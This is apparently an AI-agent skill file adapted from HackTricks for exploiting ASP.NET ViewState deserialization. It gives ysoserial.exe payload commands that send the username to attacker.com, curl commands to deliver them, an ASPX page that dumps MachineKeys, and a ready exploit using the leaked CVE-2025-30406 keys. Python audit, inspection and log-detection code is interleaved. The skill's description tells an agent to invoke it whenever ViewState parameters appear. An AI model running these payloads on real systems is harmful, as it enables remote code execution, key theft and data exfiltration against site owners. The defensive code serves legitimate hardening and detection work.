Hacktricks-skills exploit-aspnet-viewstate

Exploit ASP.NET ViewState deserialization vulnerabilities. Use this skill whenever you need to assess, enumerate, or exploit __VIEWSTATE parameters in ASP.NET applications. This includes discovering MachineKeys, generating payloads with YSoSerial.Net, and handling various .NET version configurations (pre-4.5 and 4.5+). Trigger this skill for any ASP.NET ViewState security assessment, penetration testing, or vulnerability research involving __VIEWSTATE, __VIEWSTATEGENERATOR, or __VIEWSTATEENCRYPTED parameters. Make sure to use this skill when you see ASP.NET applications with ViewState parameters, need to test for deserialization vulnerabilities, or are investigating potential MachineKey exposure.

install
source · Clone the upstream repo
git clone https://github.com/abelrguezr/hacktricks-skills
manifest: skills/pentesting-web/deserialization/exploiting-__viewstate-parameter/SKILL.MD
source content

ASP.NET ViewState Deserialization Exploitation

This skill guides you through identifying and exploiting ASP.NET ViewState deserialization vulnerabilities across different .NET versions and security configurations.

Quick Start Workflow

  1. Identify ViewState parameters in the target application
  2. Determine security configuration (MAC enabled, encryption enabled, .NET version)
  3. Discover MachineKey using Blacklist3r or Badsecrets
  4. Generate payload with YSoSerial.Net
  5. Test exploitation and verify code execution

ViewState Configuration Matrix

.NET Version   MAC        Encryption   MachineKey Required   Tool
Any            Disabled   Disabled     No                    YSoSerial.Net
< 4.5          Enabled    Disabled     Yes                   Blacklist3r
< 4.5          Any        Enabled      Yes                   Blacklist3r (in development)
>= 4.5         Any        Any          Yes                   Blacklist3r
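The matrix above is also what a defender should check web.config against. The Python below is an added example, not part of the HackTricks skill or of any tool it names: it parses a web.config fragment and flags the settings that land an application in the weakest rows (MAC disabled, encryption never, static or publicly known MachineKeys, legacy algorithms, a pre-4.5 targetFramework). The two configurations are constructed for the example, the weak one beside a hardened one; the only real values in it are the two CVE-2025-30406 keys quoted further down this page, used here as a known-compromised list.

```python
import xml.etree.ElementTree as ET

# Hard-coded keys that are public knowledge (the Gladinet CentreStack / Triofox
# CVE-2025-30406 pair quoted on this page); any config still using them is compromised.
KNOWN_LEAKED_KEYS = {
    "ACC97055B2A494507D7D7C92DC1C854E8EA7BF4C",
    "1FB1DEBB8B3B492390B2ABC63E6D1B53DC9CA2D7",
}
WEAK_VALIDATION = {"MD5", "SHA1"}   # legacy; .NET 4.x defaults to HMACSHA256
WEAK_DECRYPTION = {"DES", "3DES"}   # legacy ciphers; AES is the expected value

# Constructed weak configuration (no real deployment): every row of the matrix that
# needs no MachineKey, or whose keys are already public, is represented here.
WEAK_CONFIG = """<configuration>
  <system.web>
    <pages enableViewStateMac="false" viewStateEncryptionMode="Never" />
    <machineKey validationKey="ACC97055B2A494507D7D7C92DC1C854E8EA7BF4C"
                decryptionKey="1FB1DEBB8B3B492390B2ABC63E6D1B53DC9CA2D7"
                validation="SHA1" decryption="AES" />
    <httpRuntime targetFramework="4.0" />
  </system.web>
</configuration>"""

# Constructed hardened counterpart: MAC forced on, always encrypted, runtime-generated
# keys, modern algorithms, 4.5+ semantics.
HARDENED_CONFIG = """<configuration>
  <system.web>
    <pages enableViewStateMac="true" viewStateEncryptionMode="Always" />
    <machineKey validationKey="AutoGenerate,IsolateApps"
                decryptionKey="AutoGenerate,IsolateApps"
                validation="HMACSHA256" decryption="AES" />
    <httpRuntime targetFramework="4.8" />
  </system.web>
</configuration>"""


def _framework_version(text):
    """Parse a targetFramework value such as '4.5.2' into a comparable tuple."""
    try:
        return tuple(int(p) for p in text.split("."))
    except ValueError:
        return None


def audit_viewstate_config(config_xml):
    """Return a list of findings (strings); an empty list means nothing was flagged."""
    root = ET.fromstring(config_xml)
    findings = []
    pages = root.find("./system.web/pages")
    mk = root.find("./system.web/machineKey")
    rt = root.find("./system.web/httpRuntime")

    # Missing attributes fall back to the framework defaults (MAC on, encryption Auto).
    if pages is not None:
        if pages.get("enableViewStateMac", "true").lower() == "false":
            findings.append("pages/enableViewStateMac=false: ViewState accepted without integrity check")
        if pages.get("viewStateEncryptionMode", "Auto").lower() == "never":
            findings.append("pages/viewStateEncryptionMode=Never: serialized state readable by the client")

    if mk is not None:
        for attr in ("validationKey", "decryptionKey"):
            value = mk.get(attr, "AutoGenerate,IsolateApps")
            if value.upper() in KNOWN_LEAKED_KEYS:
                findings.append(f"machineKey/{attr} is a publicly known hard-coded key")
            elif "AUTOGENERATE" not in value.upper():
                findings.append(f"machineKey/{attr} is static: rotate it and keep it out of source control")
        if mk.get("validation", "HMACSHA256").upper() in WEAK_VALIDATION:
            findings.append(f"machineKey/validation={mk.get('validation')}: legacy algorithm, prefer HMACSHA256")
        if mk.get("decryption", "Auto").upper() in WEAK_DECRYPTION:
            findings.append(f"machineKey/decryption={mk.get('decryption')}: legacy cipher, use AES")

    # Without targetFramework, or with one below 4.5, the runtime keeps 4.0 ViewState
    # behaviour: MAC can be switched off and the client can influence encryption.
    tf = rt.get("targetFramework") if rt is not None else None
    version = _framework_version(tf) if tf else None
    if version is None or version < (4, 5):
        findings.append("httpRuntime/targetFramework below 4.5 (or unset): pre-4.5 ViewState semantics apply")
    return findings


if __name__ == "__main__":
    for name, cfg in (("weak", WEAK_CONFIG), ("hardened", HARDENED_CONFIG)):
        print(name, audit_viewstate_config(cfg) or ["no findings"])
```

A static key is flagged as a finding rather than an error because web farms legitimately need a shared key; the point is that it then has to be treated like any other secret (rotated, never committed), since a leaked MachineKey is exactly what turns the 4.5+ row of the matrix into a working exploit.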

Step 1: Identify ViewState Parameters

Capture HTTP requests with BurpSuite and look for:

  • __VIEWSTATE - The serialized state data
  • __VIEWSTATEGENERATOR - Used for MAC calculation
  • __VIEWSTATEENCRYPTED - Indicates encrypted ViewState

Step 2: Determine Security Configuration

MAC Protection (EnableViewStateMac)

  • If __VIEWSTATE is base64 only (no MAC), MAC is disabled
  • If __VIEWSTATE includes a MAC, it's enabled

Encryption (ViewStateEncryptionMode)

  • If the __VIEWSTATEENCRYPTED parameter exists, encryption is enabled
  • If ViewState appears as readable base64, encryption is disabled

.NET Version

  • Check response headers for the ASP.NET version
  • Look for the X-AspNet-Version header
  • Test with different payload formats
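To make Steps 1 and 2 repeatable, the Python below is an added example (not from the skill, not from Badsecrets or Blacklist3r): it pulls the hidden fields out of a captured response, decodes __VIEWSTATE and checks for the ObjectStateFormatter marker bytes 0xFF 0x01 (the "/wE" prefix every plaintext ViewState starts with), records whether __VIEWSTATEENCRYPTED is present and reads X-AspNet-Version. The HTML, the blobs and the headers are constructed samples; the generator value is made up. One caveat the marker check makes explicit: a plaintext stream with a MAC appended still starts with 0xFF 0x01, so the marker tells you about encryption, not about MAC.

```python
import base64
from html.parser import HTMLParser

# An ObjectStateFormatter stream opens with the format marker 0xFF and version 0x01,
# which is why an unencrypted __VIEWSTATE value always begins with the base64 text "/wE".
OSF_MARKER = b"\xff\x01"

# Constructed sample blobs: not real serialized state, only the leading bytes matter here.
PLAINTEXT_BLOB = OSF_MARKER + bytes(range(16))   # 18 bytes, looks like an unencrypted stream
OPAQUE_BLOB = bytes(range(32))                    # 32 bytes, no marker: encrypted (or not OSF)


class HiddenFieldParser(HTMLParser):
    """Collects <input type="hidden"> name/value pairs from an HTML response."""

    def __init__(self):
        super().__init__()
        self.fields = {}

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "input":
            return
        a = dict(attrs)
        if (a.get("type") or "").lower() == "hidden" and a.get("name"):
            self.fields[a["name"]] = a.get("value") or ""


def extract_hidden_fields(html):
    parser = HiddenFieldParser()
    parser.feed(html)
    return parser.fields


def inspect_viewstate(html, headers=None):
    """Summarise the ViewState-related observations from one captured response."""
    headers = {k.lower(): v for k, v in (headers or {}).items()}
    fields = extract_hidden_fields(html)
    report = {
        "has_viewstate": "__VIEWSTATE" in fields,
        "has_generator": "__VIEWSTATEGENERATOR" in fields,
        "encrypted_flag": "__VIEWSTATEENCRYPTED" in fields,
        "aspnet_version": headers.get("x-aspnet-version"),
        "decoded_length": None,
        "plaintext_osf": None,
    }
    raw = fields.get("__VIEWSTATE")
    if raw:
        try:
            blob = base64.b64decode(raw, validate=True)
        except ValueError:          # binascii.Error is a ValueError subclass
            report["decode_error"] = True
            return report
        report["decoded_length"] = len(blob)
        # Marker present: the stream is readable (MAC may or may not be appended).
        report["plaintext_osf"] = blob.startswith(OSF_MARKER)
    # Either the server says so, or the bytes are not a readable OSF stream.
    report["likely_encrypted"] = report["encrypted_flag"] or report["plaintext_osf"] is False
    return report


def _form(fields):
    """Render hidden inputs the way a Web Forms page emits them (constructed HTML)."""
    inputs = "".join(
        f'<input type="hidden" name="{n}" id="{n}" value="{v}" />' for n, v in fields.items()
    )
    return f'<html><body><form method="post" action="./page.aspx">{inputs}</form></body></html>'


# Constructed captures: a plaintext page and an encrypted one (generator value is made up).
SAMPLE_PLAIN_HTML = _form({
    "__VIEWSTATE": base64.b64encode(PLAINTEXT_BLOB).decode(),
    "__VIEWSTATEGENERATOR": "CA0B0334",
})
SAMPLE_ENCRYPTED_HTML = _form({
    "__VIEWSTATE": base64.b64encode(OPAQUE_BLOB).decode(),
    "__VIEWSTATEGENERATOR": "CA0B0334",
    "__VIEWSTATEENCRYPTED": "",
})
SAMPLE_HEADERS = {"X-AspNet-Version": "4.0.30319", "Server": "Microsoft-IIS/10.0"}

if __name__ == "__main__":
    print(inspect_viewstate(SAMPLE_PLAIN_HTML, SAMPLE_HEADERS))
    print(inspect_viewstate(SAMPLE_ENCRYPTED_HTML, SAMPLE_HEADERS))
```

Feed it the body and headers of a real capture (BurpSuite export or a curl -i dump) instead of the constructed samples; a missing X-AspNet-Version header is itself informative, since it is usually stripped deliberately.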

Step 3: Discover MachineKey

Using Badsecrets (Python, cross-platform)

# Direct ViewState analysis
python examples/blacklist3r.py --viewstate <VIEWSTATE> --generator <GENERATOR>

# URL-based extraction
python examples/blacklist3r.py --url http://target/page.aspx

# With custom keylist
bbot -f subdomain-enum -m badsecrets --badsecrets-keylist custom_keys.txt -t target.tld

Using Blacklist3r (Windows, .NET)

AspDotNetWrapper.exe --keypath MachineKeys.txt --encrypteddata <VIEWSTATE> --decrypt --purpose=viewstate --modifier=<GENERATOR> --macdecode --TargetPagePath "/path/to/page.aspx" -f out.txt --IISDirPath="/"

Step 4: Generate Payload with YSoSerial.Net

Basic payload (no MAC, no encryption)

ysoserial.exe -o base64 -g TypeConfuseDelegate -f ObjectStateFormatter -c "powershell.exe Invoke-WebRequest -Uri http://attacker.com/$env:UserName"

With MAC protection

ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "powershell.exe Invoke-WebRequest -Uri http://attacker.com/$env:UserName" --generator=<GENERATOR> --validationalg="SHA1" --validationkey="<KEY>"

With encryption

ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "powershell.exe Invoke-WebRequest -Uri http://attacker.com/$env:UserName" --path="/path/to/page" --apppath="/" --decryptionalg="AES" --decryptionkey="<KEY>" --validationalg="SHA1" --validationkey="<KEY>"

With ViewStateUserKey

ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "command" --viewstateuserkey="<USERKEY>"

Minified payload (for WAF evasion)

ysoserial.exe -p ViewState -g TypeConfuseDelegate -c "whoami" --validationkey="<KEY>" --validationalg=SHA1 --decryptionkey="<KEY>" --decryptionalg=AES --generator=<GEN> --minify

Step 5: Test Exploitation

Send the payload via:

curl -d "__VIEWSTATE=<PAYLOAD>" http://target/page.aspx

Or reading the payload from a file:

curl -d "__VIEWSTATE=$(cat payload.txt)" http://target/page.aspx

Success Indicators

  • 500 Internal Server Error with "The state information is invalid for this page and might be corrupted"
  • Out-of-band request to attacker server
  • Command execution on target
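The first success indicator is also the most useful detection signal on the server side. The Python below is an added example (not part of the skill): it parses IIS W3C log lines and surfaces clients that repeatedly POST to .aspx pages with multi-kilobyte bodies and receive 500s, the pattern a ViewState payload leaves when the page rejects the supplied state. The log excerpt is constructed, and the column names follow the #Fields directive so the same parser works on real logs with a different field order.

```python
from collections import Counter

# Constructed IIS W3C log excerpt (not from a real server). Client 203.0.113.10 hammers
# one page with POSTs that all end in HTTP 500; 198.51.100.7 produces a single ordinary
# error. IIS writes spaces inside field values as '+', so one token per field holds.
SAMPLE_IIS_LOG = """#Software: Microsoft Internet Information Services 10.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port c-ip cs(User-Agent) sc-status sc-substatus cs-bytes time-taken
2024-03-01 09:12:01 10.0.0.5 GET /default.aspx - 443 203.0.113.10 Mozilla/5.0 200 0 412 31
2024-03-01 09:12:07 10.0.0.5 POST /default.aspx - 443 203.0.113.10 curl/8.4.0 500 0 6120 88
2024-03-01 09:12:09 10.0.0.5 POST /default.aspx - 443 203.0.113.10 curl/8.4.0 500 0 6138 79
2024-03-01 09:12:12 10.0.0.5 POST /default.aspx - 443 203.0.113.10 curl/8.4.0 500 0 6142 91
2024-03-01 09:12:15 10.0.0.5 POST /default.aspx - 443 203.0.113.10 curl/8.4.0 500 0 6201 84
2024-03-01 09:13:40 10.0.0.5 POST /login.aspx - 443 198.51.100.7 Mozilla/5.0 500 0 980 40
2024-03-01 09:13:41 10.0.0.5 GET /styles.css - 443 198.51.100.7 Mozilla/5.0 200 0 300 3
"""


def parse_w3c(log_text):
    """Yield one dict per entry, using the #Fields directive for the column names."""
    fields = None
    for line in log_text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line or line.startswith("#") or fields is None:
            continue
        parts = line.split()
        if len(parts) != len(fields):
            continue  # skip malformed lines rather than misalign the columns
        yield dict(zip(fields, parts))


def viewstate_error_bursts(log_text, threshold=3, min_request_bytes=2048):
    """Return {client_ip: count} for clients at or above threshold.

    Counted: POSTs to .aspx pages answered with 500 whose request size (cs-bytes, when
    the field is logged) is large enough to carry a serialized ViewState. A single 500
    is normal application noise; a run of them from one client against one page is not.
    """
    hits = Counter()
    for e in parse_w3c(log_text):
        if e["cs-method"] != "POST" or not e["cs-uri-stem"].lower().endswith(".aspx"):
            continue
        if e["sc-status"] != "500":
            continue
        size = e.get("cs-bytes", "")
        if size.isdigit() and int(size) < min_request_bytes:
            continue
        hits[e["c-ip"]] += 1
    return {ip: n for ip, n in hits.items() if n >= threshold}


if __name__ == "__main__":
    print(viewstate_error_bursts(SAMPLE_IIS_LOG))
```

On a server where MAC is enabled and the keys are not known to the sender, the same attempts also raise ASP.NET health-monitoring event code 4009 ("Viewstate verification failed") in the Windows Application log; correlating those events with the 500 bursts above separates tampering from a stale-form user hitting the back button.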

Special Scenarios

ViewState not sent by the server

If ViewState isn't sent by the server, add it to the request body:

curl -d "__VIEWSTATE=<PAYLOAD>" http://target/page.aspx

.NET < 4.5 with Encryption

Remove the __VIEWSTATEENCRYPTED parameter to send an unencrypted payload:

# Remove __VIEWSTATEENCRYPTED from the request before sending it

Dumping MachineKeys via Reflection

If you can upload ASPX files:

<%@ Import Namespace="System.Web.Configuration" %>
<%@ Import Namespace="System.Reflection" %>
<script runat="server">
public void Page_Load(object sender, EventArgs e)
{
    var asm = Assembly.Load("System.Web");
    var sect = asm.GetType("System.Web.Configuration.MachineKeySection");
    var m = sect.GetMethod("GetApplicationConfig", BindingFlags.Static | BindingFlags.NonPublic);
    var cfg = (MachineKeySection)m.Invoke(null, null);
    Response.Write($"{cfg.ValidationKey}|{cfg.DecryptionKey}|{cfg.Decryption}|{cfg.CompatibilityMode}");
}
</script>

Known Hard-coded Keys

Gladinet CentreStack / Triofox (CVE-2025-30406)

ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "calc.exe" \
  --validationkey=ACC97055B2A494507D7D7C92DC1C854E8EA7BF4C \
  --validationalg=SHA1 \
  --decryptionkey=1FB1DEBB8B3B492390B2ABC63E6D1B53DC9CA2D7 \
  --decryptionalg=AES --generator=24D41AAB --minify

Common Gadgets

  • TypeConfuseDelegate - General purpose
  • TextFormattingRunProperties - ViewState specific
  • WinFormsUI - Windows Forms UI gadgets
  • WPF - WPF specific gadgets

References